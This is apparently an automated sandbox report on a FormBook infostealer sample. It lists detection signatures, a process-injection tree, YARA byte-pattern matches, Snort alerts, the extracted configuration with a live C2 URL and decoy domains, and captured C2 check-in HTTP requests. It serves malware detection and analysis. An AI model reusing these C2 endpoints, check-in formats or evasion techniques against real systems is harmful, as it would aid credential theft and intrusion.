Windows Analysis Report
lamsddre43321.exe

Overview

General Information

Sample Name: lamsddre43321.exe
Analysis ID: 635151
MD5: b1fcf52deb6f04ef0f898c9938f26920
SHA1: 42d8b684ff7b293c0d8ad5de6f67d14d17c0b353
SHA256: 8535282c1740725ecf68a65e9ce582a5fe28db4ffcfcd07e6b1516d62cc9dc60
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • lamsddre43321.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\lamsddre43321.exe" MD5: B1FCF52DEB6F04EF0F898C9938F26920)
    • rlpjf.exe (PID: 6484 cmdline: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy MD5: FB06AEE14DBF93907437AB4372B1BBDE)
      • rlpjf.exe (PID: 6520 cmdline: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy MD5: FB06AEE14DBF93907437AB4372B1BBDE)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6360 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6148 cmdline: /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.rebelmvmt.com/t23s/"], "decoy": ["jesusandamerican.com", "atlasgreencorp.com", "kristinsullivan.info", "moments2memories904.com", "tipdautu.com", "hucosell.com", "purplelollipops.com", "storywelldesign.com", "gordisex.com", "stratumskincareusa.com", "squishandboo.com", "carolyncareteam.com", "xn--allegon-3ya.com", "trustno1clothing.com", "provectadigital.com", "wellroyal.com", "miapersayis.com", "kutnicki.com", "flexi-tees.com", "oopsbd.com", "transitxl.com", "pacamoro.com", "togethernesslifeyoga.com", "holos-studio.com", "batpigswagsupply.com", "247resumereview.com", "metaverseart.international", "lejeunewatersettlements.com", "xyjdnice.com", "noteworthyandblue.com", "yawtl.top", "hermanmilleronline.com", "officialjabbour.com", "learn2stand.com", "bitrueexc.com", "outdoorfrog.com", "tappong.com", "bumblebeeskin.com", "hometeamdr.com", "theminiquipper.com", "sxqp262.com", "deepspacegamingrust.com", "8hck.com", "qianlaodonghetong.com", "nzyyen.com", "kabuyasu.com", "deooilltd.cfd", "boowang.com", "metadocompositor.com", "walker-shop.com", "jjyg86.com", "fineassmama.com", "quieco.xyz", "musculusbodytherapies.com", "trestoneducation.com", "lookinsoft.com", "leifengrui.top", "24hcares.com", "vanz-travel.com", "tduhe.com", "higginsuotdoors.com", "plazawoods.com", "howlongsoessoftware.com", "mapresults.com"]}
Source | Rule | Description | Author | Strings
00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com (same matched strings as listed for the first dump above)
      Source | Rule | Description | Author | Strings
      2.0.rlpjf.exe.400000.7.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.0.rlpjf.exe.400000.7.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com (same matched strings as listed for the first dump above)
        2.0.rlpjf.exe.400000.7.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group (same $sqlite3step/$sqlite3text/$sqlite3blob matches as listed for the first dump above)
        2.2.rlpjf.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.rlpjf.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com (same matched strings as listed for the first dump above)
          No Sigma rule has matched
          Timestamp: 05/27/22-15:57:04.008947
          Source IP: 192.168.2.3
          Destination IP: 154.221.90.236
          SID: 2031449
          Source Port: 49759
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 05/27/22-15:57:04.008947
          Source IP: 192.168.2.3
          Destination IP: 154.221.90.236
          SID: 2031453
          Source Port: 49759
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 05/27/22-15:57:04.008947
          Source IP: 192.168.2.3
          Destination IP: 154.221.90.236
          SID: 2031412
          Source Port: 49759
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook (C2 list and decoy domains as given in the configuration above)
          Source: lamsddre43321.exe, Virustotal: Detection: 43%
          Source: lamsddre43321.exe, ReversingLabs: Detection: 39%
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: www.rebelmvmt.com/t23s/, Avira URL Cloud: Label: malware
          Source: http://www.nzyyen.com/t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ, Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe, ReversingLabs: Detection: 36%
          Source: 2.0.rlpjf.exe.400000.9.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.rlpjf.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.rlpjf.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.rlpjf.exe.400000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.rlpjf.exe.f70000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: lamsddre43321.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb, source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL, source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\xhhad\uirflg\frvl\265a3cee655e492f8e5d84a11f9c3616\cgbuhi\tigzjzwb\Release\tigzjzwb.pdb, source: lamsddre43321.exe, 00000000.00000002.292027009.000000000040B000.00000004.00000001.01000000.00000003.sdmp, lamsddre43321.exe, 00000000.00000002.296306970.000000000288E000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000000.266573829.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000001.00000002.276856071.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000002.00000000.274730046.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, msiexec.exe, 0000000F.00000002.541755061.00000000054CF000.00000004.10000000.00040000.00000000.sdmp, rlpjf.exe.0.dr, nsrD708.tmp.0.dr
          Source: Binary string: wntdll.pdbUGP, source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb, source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\lamsddre43321.exe, Code function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\lamsddre43321.exe, Code function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\lamsddre43321.exe, Code function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe, Code function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then pop edi

          Networking

          Source: C:\Windows\explorer.exe, Domain query: www.nzyyen.com
          Source: C:\Windows\explorer.exe, Network Connect: 154.221.90.236 80
          Source: C:\Windows\explorer.exe, Network Connect: 35.204.150.5 80
          Source: C:\Windows\explorer.exe, Domain query: www.higginsuotdoors.com
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 154.221.90.236:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 154.221.90.236:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 154.221.90.236:80
          Source: Malware configuration extractor, URLs: www.rebelmvmt.com/t23s/
          Source: Joe Sandbox View, ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global traffic, HTTP traffic detected: GET /t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ HTTP/1.1, Host: www.nzyyen.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ HTTP/1.1, Host: www.higginsuotdoors.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: msiexec.exe, 0000000F.00000002.541916856.00000000059BF000.00000004.10000000.00040000.00000000.sdmp, String found in binary or memory: https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3X
          Source: unknown, DNS traffic detected: queries for: www.nzyyen.com
          Source: global traffic, HTTP traffic detected: GET /t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ HTTP/1.1, Host: www.nzyyen.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ HTTP/1.1, Host: www.higginsuotdoors.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: lamsddre43321.exe, 00000000.00000002.292883892.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\lamsddre43321.exe, Code function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match, File source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: lamsddre43321.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
